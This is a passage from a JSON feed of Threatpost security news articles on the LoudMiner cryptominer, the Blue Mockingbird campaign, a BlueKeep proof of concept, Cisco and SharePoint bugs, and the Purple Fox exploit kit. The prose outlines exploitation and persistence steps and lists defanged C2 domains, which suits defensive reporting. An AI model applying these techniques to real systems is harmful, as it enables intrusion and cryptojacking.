\u201cThe attackers use this to their advantage to camouflage their virtual machine (VM) images.\u201d\n\nDespite the efforts at camouflage, victims quickly become aware that something\u2019s amiss, thanks to system slowdowns, according to [forum postings](<https://discussions.apple.com/thread/8602989>).\n\n\u201cUnfortunately, had to reinstall OSX, the problem was that Ableton Live 10, which I have downloaded it from a torrent site and not from the official site, installs a miner too, running at the background causing this,\u201d said a user named \u201cMacloni.\u201d\n\n\u201cThe same user attached screenshots of the Activity Monitor indicating 2 processes \u2013 qemu-system-x86_64 and tools-service \u2013 taking 25 percent of CPU resources and running as root,\u201d said Malik, adding that some users found a full 100 percent of their CPU capacity hijacked.\n\n## Using a Virtual Machine\n\nLoudMiner uses QEMU on macOS and VirtualBox on Windows to connect to a Linux image running on a VM \u2013 more specifically, it\u2019s a Tiny Core Linux 9.0 image configured to run XMRig. The victim\u2019s machine is added to a mining pool that the Linux image uses for CPU power.\n\nMalik noted that the decision by the malware authors to use VMs for performing the mining instead of hosting it locally on the victim\u2019s computer is \u201cquite remarkable and this is not something we routinely see\u201d \u2013 although it\u2019s not unheard of for legitimate miners to [deploy the strategy](<https://medium.com/@Jayvdb/how-to-start-mining-cryptocurrency-for-fun-and-possibly-profit-71517859ed91>) to save money.\n\n\u201cUser downloads the application and follows attached instructions on how to install it. LoudMiner is installed first, the actual VST software after,\u201d he explained. \u201cLoudMiner hides itself and becomes persistent on reboot. 
The Linux virtual machine is launched and [the mining starts](<https://threatpost.com/cryptomining-malware-uninstalls-cloud-security-products/140959/>). Scripts inside the virtual machine can contact the C2 server to update the miner.\u201d\n\nHe said that in order to identify a particular mining session, a file containing the IP address of the machine and the day\u2019s date is created by the \u201cidgenerator\u201d script and its output is sent to the C2 server by the \u201cupdater.sh script.\u201d\n\nBecause LoudMiner uses a mining pool, it\u2019s impossible to retrace potential transactions to find out how successful the adversaries have been thus far, he added.\n\nTo avoid the threat, age-old advice applies: Don\u2019t download pirated copies of commercial software. Malik also offered some hints to identify when an application contains unwanted code. Red flags include a trust popup from an unexpected, \u201cadditional\u201d installer; high CPU consumption by a process one did not install (QEMU or VirtualBox in this case); a new service added to the startup services list; and network connections to curious domain names (such as system-update[.]info or system-check[.]services).\n", "modified": "2019-06-20T19:53:23", "published": "2019-06-20T19:53:23", "id": "THREATPOST:FD8657F42A74CEDAA8D3F25A2362E6E8", "href": "https://threatpost.com/loudminer-cryptominer-linux/145871/", "type": "threatpost", "title": "LoudMiner Cryptominer Uses Linux Image and Virtual Machines", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:25:29", "bulletinFamily": "info", "cvelist": ["CVE-2019-18935", "CVE-2020-5135"], "description": "A Monero cryptocurrency-mining campaign has emerged that exploits a known vulnerability in public-facing web applications built on the ASP.NET open-source web framework.\n\nThe campaign has been dubbed Blue Mockingbird by the analysts at Red Canary that discovered the activity. 
Research uncovered that the cybercriminal gang is exploiting a deserialization vulnerability, [CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>), which can allow remote code execution. The bug is found in the Progress Telerik UI front-end offering for ASP.NET AJAX.\n\nAJAX stands for Asynchronous JavaScript and XML; it\u2019s used to add script to a webpage which is executed and processed by the browser. Progress Telerik UI is an overlay for controlling it on ASP.NET implementations.\n\nThe vulnerability lies specifically in the RadAsyncUpload function, according to the writeup on the bug in the National Vulnerability Database. This is exploitable when the encryption keys are known (via another exploit or other attack), meaning that any campaign relies on a chaining of exploits.\n\nIn the current attacks, Blue Mockingbird attackers are uncovering unpatched versions of Telerik UI for ASP.NET, deploying the [XMRig Monero-mining payload](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>) in dynamic-link library (DLL) form on Windows systems, then executing it and establishing persistence using multiple techniques. From there, the infection propagates laterally through the network.\n\nThe activity appears to stretch back to December, according to the analysis, and continued through April at least.\n\nXMRig is open-source and can be compiled into custom tooling, according to the analysis. 
Red Canary has observed three distinct execution paths: Execution with rundll32.exe explicitly calling the DLL export fackaaxv; execution using regsvr32.exe using the /s command-line option; and execution with the payload configured as a Windows Service DLL.\n\n\u201cEach payload comes compiled with a standard list of commonly used Monero-mining domains alongside a Monero wallet address,\u201d explained researchers at Red Canary, in a [Thursday writeup](<https://redcanary.com/blog/blue-mockingbird-cryptominer/>). \u201cSo far, we\u2019ve identified two wallet addresses used by Blue Mockingbird that are in active circulation. Due to the private nature of Monero, we cannot see the balance of these wallets to estimate their success.\u201d\n\nTo establish persistence, Blue Mockingbird actors must first elevate their privileges, which they do using various techniques; for instance, researchers observed them using a JuicyPotato exploit to escalate privileges from an IIS Application Pool Identity virtual account to the NT Authority\\SYSTEM account. In another instance, the Mimikatz tool (the official signed version) was used to access credentials for logon.\n\nArmed with the proper privileges, Blue Mockingbird leveraged multiple persistence techniques, including the use of a COR_PROFILER COM hijack to execute a malicious DLL and restore items removed by defenders, according to Red Canary.\n\n\u201cTo use COR_PROFILER, they used wmic.exe and Windows Registry modifications to set environment variables and specify a DLL payload,\u201d the writeup explained.\n\nBlue Mockingbird likes to move laterally to distribute mining payloads across an enterprise, added researchers. 
The attackers do this by using their elevated privileges and Remote Desktop Protocol (RDP) to access privileged systems, and then Windows Explorer to then distribute payloads to remote systems.\n\nAlthough Blue Mockingbird has been making noticeable waves, the toolkit is a work in progress.\n\n\u201cIn at least one engagement, we observed Blue Mockingbird seemingly experimenting with different tools to create SOCKS proxies for pivoting,\u201d said the researchers. \u201cThese tools included a fast reverse proxy (FRP), Secure Socket Funneling (SSF) and Venom. In one instance, the adversary also tinkered with PowerShell reverse TCP shells and a reverse shell in DLL form.\u201d\n\nIn terms of preventing the threat, patching web servers, web applications and dependencies of the applications to inhibit initial access is the best bet, according to Red Canary.\n
", "modified": "2020-05-07T21:01:37", "published": "2020-05-07T21:01:37", "id": "THREATPOST:A94AAFAF28062A447CCD0F4C47FFD78C", "href": "https://threatpost.com/blue-mockingbird-monero-mining/155581/", "type": "threatpost", "title": "Blue Mockingbird Monero-Mining Campaign Exploits Web Apps", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-07T21:57:53", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708", "CVE-2019-18935"], "description": "A researcher has created a proof-of-concept Metasploit module for the critical BlueKeep vulnerability, which successfully demonstrates how to achieve complete takeover of a target Windows machine.\n\nReverse engineer Z\u01dd\u0279osum0x0 [tweeted about his success](<https://twitter.com/zerosum0x0/status/1135866953996820480>) on Tuesday, noting that he plans to keep the module private given the danger that a working exploit could pose to the vast swathe of unpatched systems out there. He also released a video showing a remote code-execution (RCE) exploit working on a Windows 2008 desktop, paired with a Mimikatz tool to harvest login credentials. In about 22 seconds, he achieved full takeover.\n\n\u201cStill too dangerous to release, lame sorry,\u201d he tweeted. 
\u201cMaybe after first mega-worm?\u201d\n\nAn [earlier proof-of-concept (PoC) from McAfee](<https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/>) showed a successful RCE exploit, but didn\u2019t include the credential-harvesting \u2013 so a mitigating factor in that exploit would be the need for an attacker to bypass network-level authentication protections.\n\nThe BlueKeep RCE flaw (CVE-2019-0708) exists in Remote Desktop Services and impacts older versions of Windows, including Windows 7, Windows XP, Server 2003, Server 2008 and Server 2008 R2. The main thing that sets BlueKeep apart is the fact that it\u2019s wormable \u2013 and so it can self-propagate from machine to machine, setting up the scene for a [WannaCry-level, fast-moving infection wave](<https://threatpost.com/the-wannacry-security-legacy-and-whats-to-come/144607/>).\n\nThe concern is big enough that Microsoft even took the unusual step of deploying patches to Windows XP and Windows 2003, which are end-of-life and no longer supported by the computing giant. It has also issued multiple follow-on advisories urging administrators to patch.\n\nThe new exploit works on most vulnerable machines, with the exception of Windows Server 2003, according to Z\u01dd\u0279osum0x0. The researcher [said that it took time](<https://twitter.com/zerosum0x0/status/1135219212199186434>) to develop the exploit, but clearly it can be achieved.\n\nThe National Security Agency concurs with the engineer on the possibility of widespread, in-the-wild exploitation.\n\n\u201cIt is likely only a matter of time before remote exploitation code is widely available for this vulnerability,\u201d the NSA said in [an advisory](<https://www.us-cert.gov/ncas/current-activity/2019/06/04/NSA-Releases-Advisory-BlueKeep-Vulnerability>) on Tuesday. 
\u201cNSA is concerned that malicious cyber-actors will use the vulnerability in ransomware and exploit kits containing other known exploits, increasing capabilities against other unpatched systems.\u201d\n\nThe danger isn\u2019t just the potential for a worm-wave; denial-of-service could be a problem too. Researchers attempting to create PoC exploits found that their efforts [largely caused systems to crash](<https://www.exploit-db.com/exploits/46946>) before they could achieve RCE.\n\nTo boot, the attack surface is unfortunately large. Although Microsoft issued a patch for the recently disclosed BlueKeep as part of its [May Patch Tuesday](<https://threatpost.com/microsoft-patches-zero-day/144742/>) Security Bulletin (and there\u2019s a [micropatch](<https://0patch.com/patches.html>) out there too), [researchers said last week](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) that at least 1 million devices linked to the public internet are still vulnerable to the bug. 
And, the NSA in its advisory warned that the number could actually be in the multimillions.\n\nSome are finding patching to be an onerous process given that many older machines are in production environments where the required reboot \u2013 taking mission-critical systems offline \u2014 just isn\u2019t feasible.\n\n> But patch deployment will take 35 days and we cant deploy to 18.24% because downtime issues and we've raised the requests for the rest into the change tool and \u2026\u2026..\n> \n> \u2014 Taz Wake (@tazwake) [June 4, 2019](<https://twitter.com/tazwake/status/1135890835101368321?ref_src=twsrc%5Etfw>)\n\nNonetheless, with the demonstration that RCE can be achieved, hopefully administrators will find a way to update their environments.\n\n\u201cIt only takes one vulnerable computer connected to the internet to provide a potential gateway into these corporate networks, where advanced malware could spread, infecting computers across the enterprise,\u201d Microsoft warned in [an advisory](<https://blogs.technet.microsoft.com/msrc/2019/05/30/a-reminder-to-update-your-systems-to-prevent-a-worm/>). 
\u201cThis scenario could be even worse for those who have not kept their internal systems updated with the latest fixes, as any future malware may also attempt further exploitation of vulnerabilities that have already been fixed.\u201d\n", "modified": "2019-06-05T14:14:47", "published": "2019-06-05T14:14:47", "id": "THREATPOST:58D6B44423A20EFC8CC4AD8B195A7228", "href": "https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/", "type": "threatpost", "title": "BlueKeep 'Mega-Worm' Looms as Fresh PoC Shows Full System Takeover", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:27:16", "bulletinFamily": "info", "cvelist": ["CVE-2019-1458", "CVE-2019-1491"], "description": "UPDATE\n\nMicrosoft has added a fresh CVE to its security portal, linking it to the existing November security updates (the patch itself was already included in the updates, but not specifically named). The CVE describes a vulnerability in SharePoint Server.\n\nAccording to a Microsoft Security Advisory, an attacker could exploit the bug (CVE-2019-1491) to obtain sensitive information and then use that information to mount further attacks.\n\n\u201cAn information disclosure vulnerability exists in SharePoint Server. An attacker who exploited this vulnerability could read arbitrary files on the server,\u201d according to [the advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1491>), published on Tuesday. \u201cTo exploit the vulnerability, an attacker would need to send a specially crafted request to a susceptible SharePoint Server instance.\u201d\n\nThe reading pane is not an attack vector, the computing giant added.\n\nThe patch addresses the important-severity vulnerability by changing how affected APIs process requests. 
Microsoft SharePoint Enterprise Server 2016, Microsoft SharePoint Foundation 2010 SP2 and 2013 SP1 and Microsoft SharePoint Server 2019 are impacted; Saif ElSherei of Microsoft Research Center\u2019s Vulnerabilities and Mitigations Team is credited with discovering the bug.\n\nThe CVE has been added to the computing giant\u2019s existing stash of Patch Tuesday security updates.\n\n[December\u2019s Patch Tuesday](<https://threatpost.com/microsoft-actively-exploited-zero-day-bug/150992/>) was relatively light, and it delivered just 37 CVEs (including the new one) across a range of products. The scheduled security update this month in all now includes patches for Microsoft Windows, Internet Explorer, Microsoft Office and related apps, SQL Server, Visual Studio and Skype for Business; it addressed seven bugs that are rated critical, 29 that are rated important (including the new bug), and one rated moderate in severity.\n\nOne of the updates is a fix for a bug that was first seen being exploited in the wild as a zero-day. [CVE-2019-1458](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458?ranMID=43674&ranEAID=je6NUbpObpQ&ranSiteID=je6NUbpObpQ-ar.N8FRT6gAnfwe0LIsu3w&epi=je6NUbpObpQ-ar.N8FRT6gAnfwe0LIsu3w&irgwc=1&OCID=AID2000142_aff_7795_1243925&tduid=\\(ir__6kyw1a3v19kfrhwjkk0sohzn0n2xgdsljxwdqz2h00\\)\\(7795\\)\\(1243925\\)\\(je6NUbpObpQ-ar.N8FRT6gAnfwe0LIsu3w\\)\\(\\)&irclickid=_6kyw1a3v19kfrhwjkk0sohzn0n2xgdsljxwdqz2h00>) is an elevation-of-privilege vulnerability in Win32k; the exploit allows attackers to gain higher privileges on the attacked machine and avoid protection mechanisms in the Google Chrome browser, researchers said.\n\n**_This post was updated at 10:50 a.m. ET on Dec. 19 to correct the statement that this was an \u201cout-of-band\u201d security patch. CISA/US-CERT mistakenly issued an alert using that language, leading to confusion on the part of this reporter and many others. We apologize for the error. 
_**\n", "modified": "2019-12-18T19:14:55", "published": "2019-12-18T19:14:55", "id": "THREATPOST:8A816F536308CF8DB9594CD95292E06E", "href": "https://threatpost.com/microsoft-issues-out-of-band-update-sharepoint-bug/151260/", "type": "threatpost", "title": "Microsoft Issues Out-of-Band Update for SharePoint Bug", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-24T20:49:12", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720", "CVE-2019-1458"], "description": "As the COVID-19 pandemic continues to force in-person cybersecurity event cancellations, Kaspersky is forging ahead with a virtual security summit, SAS@home.\n\nTopics on [the agenda](<https://thesascon.com/SAS@home>) include threat intel on advanced persistent threats (APTs), new vulnerability research, and topics related to a post-crisis world \u2013 such as how the industry is changing because of the pandemic.\n\nThe online conference, scheduled for April 28-30, is meant to complement the firm\u2019s annual Security Analyst Summit (SAS). The in-person SAS event was originally scheduled for April in Barcelona, and will now take place in November \u2013 with SAS@home providing an opportunity for community to come together and share insights and research in the meantime.\n\nExperts from across the IT security industry will present three days of knowledge sharing, [pecha-kucha moments](<https://www.pechakucha.com/>), \u201cfireside chats\u201d and Master Class training sessions. The sessions will be presented live, free to all participants via the ON24 webinar platform, with on-demand replays available after the fact. The event will run each day from 11 a.m. to 1 p.m. 
ET.\n\n\u201c[Attendees] will enjoy a unique opportunity to chat online and learn from some of the world\u2019s leading cybersecurity researchers and influencers in a welcoming atmosphere, while also taking a deep dive into a top-notch program of topical presentations typical for the regular SAS,\u201d Kaspersky said in a media statement.\n\nPresentations will cover new, unpublished research as well as the latest evolutions of known trends. For instance, \u201cHiding in Plain Sight: An APT Comes into a Market\u201d on Tuesday will feature Kaspersky researchers Alexey Firsh and Lev Pikman opening the kimono on previously undisclosed threat intelligence regarding a nation-state cybercriminal group.\n\nMeanwhile, \u201cZero-day Exploits of Operation WizardOpium,\u201d also on Tuesday, will feature Kaspersky researchers Anton Ivanov and Boris Larin offering a deep dive and new information regarding the weapons arsenal of a sophisticated threat group. The group shares characteristics with known APTs like DarkHotel and Lazarus Group \u2013 but have evaded any serious attribution attempts. WizardOpium attacks [were seen in November](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) using a zero-day for Google\u2019s Chrome browser (CVE-2019-13720) and [in December](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>) exploiting yet another to gain elevation-of-privilege (CVE-2019-1458) on targets as well as to escape the Chrome process sandbox.\n\nAlso of note in the agenda are presentations from third-party researchers, including Joe FitzPatrick, researcher with Securing Hardware; Ryan Naraine, director of security strategy at Intel; Sounil Yu, CISO in residence at YL Ventures; and Alex Frappier, director of strategic partnerships with the CanCyber Foundation. 
Other third-party speakers are to be announced.\n\nFitzPatrick, who [spoke at last year\u2019s SAS event](<https://threatpost.com/sas-2019-joe-fitzpatrick-warns-of-the-5-supply-chain-attack/143684/>) in Singapore, will use his session on Tuesday, \u201cHardware Hacking Under Quarantine,\u201d to show off almost a dozen unique avenues where an attacker might access PCI express interfaces in a computer\u2019s hardware in order to mount a [direct memory access (DMA) attack](<https://threatpost.com/rambleed-side-channel-privileged-memory/145629/>) on the target system.\n\n\u201cUp to this point the majority of the research has been done against laptop, desktop and server systems through full-size PCI express ports or Thunderbolt ports,\u201d FitzPatrick told Threatpost. \u201cI quickly show a bunch of places, including on smaller embedded devices, where this can also be done.\u201d\n\nFitzPatrick\u2019s session will be in a pecha-kucha 20\u00d720 presentation format, where the speaker shows 20 images, each for 20 seconds, to tell a 400-second story with visuals guiding the way. Another pecha-kucha presentation will come from Kaspersky\u2019s David Jacoby, who [also spoke at last year\u2019s event](<https://threatpost.com/social-engineering-telcos-phone-hijacking/144495/>). For SAS@home, he\u2019ll be presenting on \u201cHow Does COVID-19 Affect the Internet?\u201d on Wednesday.\n\nCanCyber\u2019s Frappier meanwhile will be giving a deep-dive training Master Class on Thursday on the importance of body language. 
Specifically, he\u2019ll be discussing how red teams can use an understanding of nonverbal cues as a way to increase their chances of success while making impersonation or [\u201cvishing\u201d attacks](<https://threatpost.com/romanian-hackers-extradited-to-u-s-over-18m-vishing-scam/131763/>).\n\nFrappier told Threatpost that the subject is important in the context of today\u2019s threat landscape given that falling for social-engineering attacks is an enduring issue, and at the same time, video has become an important communication avenue in today\u2019s challenging times.\n\n\u201cWe have a difficult time reading people, and our adversaries are aware of this,\u201d he told Threatpost. \u201cYet, this is a two-way street. Better reading and understanding of the nonverbal will make us better at detecting important threats. Better encoding for our nonverbal message will allow us to become better communicators. We will get our message across and will get buy-in from managers and commercial partners.\u201d\n\nAs for the other planned sessions, Intel\u2019s Naraine will offer a Tuesday fireside chat on what cybersecurity could look like in a post-crisis world, on the other side of the pandemic. Kaspersky\u2019s Costin Raiu meanwhile will offer another Master Class (topic to be determined) on Wednesday; and on Thursday, Igor Kuznetsov of Kaspersky will present a session on \u201cStatic Binary Analysis: The Essentials.\u201d\n\nThe agenda will also feature a few surprise guests, according to conference organizers.\n\nYou can keep up with the event via Threatpost, which will be providing daily reports on the virtual conference.\n
", "modified": "2020-04-24T20:44:05", "published": "2020-04-24T20:44:05", "id": "THREATPOST:230DF95E70EB9C4F372C198798822D19", "href": "https://threatpost.com/sashome-virtual-summit-showcases-threat-intel/155128/", "type": "threatpost", "title": "SAS@Home Virtual Summit Showcases New Threat Intel, Industry Changes", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-07T21:58:06", "bulletinFamily": "info", "cvelist": ["CVE-2019-1845", "CVE-2019-1849", "CVE-2019-1860", "CVE-2019-1861", "CVE-2019-18935"], "description": "A high-severity bug has been found that allows remote attackers to hijack Cisco\u2019s enterprise-class Industrial Network Director. The vulnerability was made public Wednesday along with a patch; there are no workarounds for the bug and [a software patch is required](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190605-ind-rce>), Cisco said.\n\nCisco\u2019s Industrial Network Director is a network management platform for visualizing industrial assets, and securing and managing them.\n\n\u201cThe vulnerability (CVE-2019-1861) is due to improper validation of files uploaded to the affected application,\u201d [Cisco wrote in its security advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190605-ind-rce>). \u201cAn attacker could exploit this vulnerability by authenticating to the affected system using administrator privileges and uploading an arbitrary file. 
A successful exploit could allow the attacker to execute arbitrary code with elevated privileges.\u201d\n\nImpacted are versions of Industrial Network Director prior to the 1.6.0 release.\n\n## Additional High-Severity Bugs\n\nOn Wednesday Cisco also released a fix for an additional high-severity flaw found in TelePresence VCS and multiple releases of its Unified Communications Manager (versions X8.1 to X12.5.2) products.\n\n\u201cA vulnerability in the authentication service of the Cisco Unified Communications Manager IM and Presence (Unified CM IM&P) Service, Cisco TelePresence Video Communication Server (VCS) and Cisco Expressway Series could allow an unauthenticated, remote attacker to cause a service outage for users attempting to authenticate, resulting in a denial of service condition,\u201d Cisco [wrote in its advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190605-cucm-imp-dos>) on the bug (CVE-2019-1845).\n\nThe vulnerability traces back to insufficient controls for specific memory operations, it said.\n\nMeanwhile, on Monday, Cisco also [released an update to a high-severity denial-of-service vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-iosxr-evpn-dos>) (CVE-2019-1849), originally made public on May 15.\n\nCisco said this bug impacts routers running a vulnerable release of Cisco IOS XR Software and that are participating in a Border Gateway Protocol (BGP) Multiprotocol Label Switching (MPLS)-based Ethernet VPN (EVPN).\n\n\u201c[An] implementation of Cisco IOS XR Software could allow an unauthenticated, adjacent attacker to trigger a denial-of-service condition on an affected device,\u201d Cisco wrote.\n\nAnd also of note, on Thursday Cisco released a patch for a [medium-severity remote file injection bug](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-cuic-cmdinj>) 
(CVE-2019-1860). On Wednesday it released patches for an [additional seven medium-severity vulnerabilities](<https://tools.cisco.com/security/center/publicationListing.x?product=Cisco&sort=-day_sir#~Vulnerabilities>).\n\nLast month, Cisco had an unusually busy patching month, tackling everything from a critical vulnerability in the [Cisco Elastic Services Controller](<https://threatpost.com/critical-flaw-in-cisco-elastic-services-controller-allows-full-system-takeover/144452/>), [a high-severity bug](<https://threatpost.com/cisco-bugs-unpatched-millions-devices/144692/>) in its web-based user interface (Web UI) of the Cisco IOS XE Software and [a flaw in the Secure Boot trusted hardware root-of-trust](<https://threatpost.com/cisco-patch-firmware/144936/>) affecting several model routers, switches and firewalls \u2014 this latter bug is still not patched for many of the millions of devices it affects.\n
", "modified": "2019-06-06T17:43:57", "published": "2019-06-06T17:43:57", "id": "THREATPOST:D15D3ADBA9A153B33E9ADCC9E9D6E07D", "href": "https://threatpost.com/cisco-high-severity-bugs/145446/", "type": "threatpost", "title": "High-Severity Bug in Cisco Industrial Enterprise Tool Allows RCE", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:23:02", "bulletinFamily": "info", "cvelist": ["CVE-2015-1701", "CVE-2018-8120", "CVE-2019-1458", "CVE-2020-0674"], "description": "The Purple Fox exploit kit (EK) has added two new exploits targeting critical- and high-severity Microsoft vulnerabilities to its bag of tricks \u2013 and researchers say they expect more attacks to be added in the future.\n\nThe Purple Fox EK was [previously analyzed](<https://blog.trendmicro.com/trendlabs-security-intelligence/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell/>) in September, when researchers said that it appears to have been built to [replace the Rig EK](<https://threatpost.com/inside-the-rig-exploit-kit/121805/>) in the distribution chain of Purple Fox malware, which is a trojan/rootkit. The latest revision to the exploit kit has added attacks against flaws tracked as [CVE-2020-0674](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0674>) and [CVE-2019-1458](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1458>), which were first disclosed at the end of 2019 and early 2020. 
Purple Fox previously [used exploits](<https://securityintelligence.com/news/purple-fox-malware-spread-by-rig-exploit-kit-capable-of-abusing-powershell/>) targeting older Microsoft flaws, including ones tracked as [CVE-2018-8120](<https://nvd.nist.gov/vuln/detail/CVE-2018-8120>) and [CVE-2015-1701](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1701>).\n\n\u201cThis tells us that the authors of Purple Fox are staying up to date on viable exploitable vulnerabilities and updating when they become available,\u201d said researchers with Proofpoint in a [Monday analysis](<https://www.proofpoint.com/us/blog/threat-insight/purple-fox-ek-adds-exploits-cve-2020-0674-and-cve-2019-1458-its-arsenal>). \u201cIt\u2019s reasonable to expect that they will continue to update as new vulnerabilities are discovered.\u201d\n\nCVE-2020-0674 is a [critical scripting engine memory corruption](<https://threatpost.com/microsoft-zero-day-actively-exploited-patch/152018/>) vulnerability in Internet Explorer, which was [disclosed](<https://twitter.com/msftsecresponse/status/1218296055579602944>) by Microsoft in a January 2020 out-of-band security advisory. The flaw could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user \u2013 meaning that an adversary could [gain the same user rights](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) as the current user. The flaw was later [fixed](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0674>) as part of the February 2020 Patch Tuesday release. 
Since then, further analysis of the flaw has been [published](<https://labs.f-secure.com/blog/internet-exploiter-understanding-vulnerabilities-in-internet-explorer>) and proof-of-concept (PoC) code has been [released](<https://github.com/maxpl0it/CVE-2020-0674-Exploit>), said researchers.\n\nCVE-2019-1458 meanwhile is a high-severity [elevation-of-privilege vulnerability](<https://threatpost.com/microsoft-actively-exploited-zero-day-bug/150992/>) in Win32k, which has a zero-day exploit circulating in the wild (used in attacks including [Operation WizardOpium](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>)). The exploit allows attackers to gain higher privileges on the attacked machine and avoid protection mechanisms in the Google Chrome browser, researchers said. The flaw, which has a CVSS score of 7.8 out of 10, was [fixed](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458>) by Microsoft as part of its December Patch Tuesday release.\n\n## **Purple Fox**\n\nResearchers discovered a malvertising campaign in late June that utilized the Purple Fox EK, successfully exploiting Internet Explorer 11 via CVE-2020-0674 on Windows 10. The exploit used for CVE-2020-0674 targets Internet Explorer\u2019s usage of jscript.dll, a library required for Windows to operate. At the start of the exploit process, the malicious script attempts to leak an address from the RegExp implementation within jscript.dll.\n\nWith that leaked address, the malicious JavaScript code then searches for the PE header of jscript.dll, and then uses that header to locate an import descriptor for kernel32.dll. That contains the process and memory manipulation functions required for the EK to load the actual shellcode.\n\n\u201cIn particular, the function GetModuleHandleA is used to obtain the running module handle,\u201d said researchers. 
\u201cThis handle is used along with GetProcAddress to locate VirtualProtect, which is in turn used to enable \u2018read, write, execute\u2019 (RWX) permissions on the shellcode. Finally, the shellcode is triggered by calling an overwritten implementation of RegExp::test.\u201d\n\nThe shellcode then locates WinExec to create a new process, which begins the actual execution of the malware.\n\n## **EK Future**\n\nWhile exploit kits are [not as popular as they were](<https://threatpost.com/where-have-all-the-exploit-kits-gone/124241/>) a few years ago, researchers stress that they are [still part of the](<https://threatpost.com/threatlist-exploit-kits-still-a-top-web-based-threat/133044/>) threat landscape, with EKs like [Fallout and Rig continually retooling](<https://threatpost.com/fallout-ek-retools/141027/>).\n\n\u201cOne thing that hasn\u2019t changed regarding exploit kits is the way in which exploit-kit authors regularly update to include new attacks against newly discovered vulnerabilities,\u201d researchers said.\n\nBy building their own EK for distribution, the authors of the Purple Fox malware have been able to save money by no longer paying for the Rig EK. This shows that the attackers behind the Purple Fox malware are taking a \u201cprofessional approach\u201d by looking to save money and keep their product current, researchers said.\n\n\u201cThe fact that the authors of the Purple Fox malware have stopped using the RIG EK and moved to build their own EK to distribute their malware reminds us that malware is a business,\u201d they said. \u201cIn essence, the authors behind the Purple Fox malware decided to bring development \u2018in-house\u2019 to reduce costs, just like many legitimate businesses do. Bringing the distribution mechanism \u2018in-house\u2019 also enables greater control over what the EK actually loads.\u201d\n", "modified": "2020-07-06T15:21:30", "published": "2020-07-06T15:21:30", "id": "THREATPOST:F0CFD85C624CF71A4056F7DCC02BD683", "href": "https://threatpost.com/microsoft-exploits-purple-fox-ek/157157/", "type": "threatpost", "title": "Purple Fox EK Adds Microsoft Exploits to Arsenal", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T05:50:38", "bulletinFamily": "info", "cvelist": ["CVE-2018-17462", "CVE-2018-17463", "CVE-2018-17464", "CVE-2018-17465", "CVE-2018-17466"], "description": "Google has lifted the curtain on its latest version of Chrome, which the tech giant has pledged touts more data privacy features, as well as fixes for high-priority vulnerabilities.\n\nThe release comes after Google had promised updates in Chrome 70 to \u201cbetter communicate our changes and offer more control over the experience.\u201d\n\nChrome 70 for Windows, Mac and Linux will roll out over the coming days and weeks, Google said in a Tuesday [posting](<https://chromereleases.googleblog.com/2018/10/stable-channel-update-for-desktop.html>).\n\n## New Privacy Feature\n\nMost notably, Chrome 70 includes a panel enabling users to have more control over how the browser behaves when they log into their Google accounts.\n\nThe pressure is on Google to prioritize privacy policies after the tech giant came under fire for a change in Chrome 69, launched [earlier in 
September](<https://threatpost.com/google-rolls-out-40-fixes-with-chrome-69/137210/>). After that release, an update to the browser\u2019s sign-in mechanism [automatically signed users into Chrome](<https://threatpost.com/googles-forced-sign-in-to-chrome-raises-privacy-red-flags/137651/>) when they signed into any other Google service.\n\nDigs at Google increased when a separate researcher also found that when he deleted the cookies.txt files in Chrome, the browser clears all cookies \u2013 except for Google cookies.\n\nBut the new control panel means that users have the option to turn off the automatic sign-in, Zach Koch, Chrome product manager, said in a [post](<https://www.blog.google/products/chrome/product-updates-based-your-feedback/>) on the matter.\n\n\u201cWhile we think sign-in consistency will help many of our users, we\u2019re adding a control that allows users to turn off linking web-based sign-in with browser-based sign-in\u2014that way users have more control over their experience,\u201d he said. 
